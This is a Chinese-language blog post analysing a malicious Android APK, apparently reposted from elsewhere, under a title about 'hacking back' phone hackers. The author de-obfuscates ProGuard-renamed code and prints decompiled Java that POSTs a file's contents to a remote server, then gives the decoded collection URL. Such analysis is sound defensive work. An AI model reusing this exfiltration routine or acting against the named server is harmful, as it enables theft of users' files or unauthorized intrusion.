看我如何回怼手机黑客？黑回去！

攻击者使用了工具ProGuard来对字符串和函数名进行了混淆，所以前述的我找不到任何URL字符串的原因就在于此。ProGuard是一个压缩、优化和混淆Java字节码文件的免费的工具，它可以删除无用的类、字段、方法和属性。解码之后，可以看到，其中包含了以下信息：

private static final String f5386b = "POST" 
private static final String f5387c = "Content-Type" 
private static final String f5388d = "Application/x-www-form-urlencoded" 

接着，我检查了有哪些函数间接调用了 “HttpURLConnection” 类函数m7665a，结果是这样的：

private static void m7672b(File file) { 
    C1548e.m7665a(C1489a.m7489b(), C1551f.m7671a(file, C1489a.f5198i)).trim(); 
} 
public static String m7489b() { 
    return f5199j + C1489a.m7487a() + f5201l; 
} 
public static String m7487a() { 
    C1545b c1545b = new C1545b(f5203n.getFilesDir().getAbsolutePath(), f5202m); 
    if (c1545b.exists()) { 
        String str = new String(c1545b.m7647a()); 
        if (!(str == null || str.isEmpty())) { 
            return str; 
        } 
    } 
    return f5204o; 
} 

经过分析，我发现，函数m7672b在函数m7489b中定义URL链接时调用了函数m7665a，而在m7487a函数中，在末尾它返回了包含URL链接的f5204o。解码之后，该APK请求的远程服务器URL链接为：

HTTP://WWW.GLANCELOVE.COM/APPS/d/p/OP.PHP

（编辑：PHP编程网 - 湛江站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!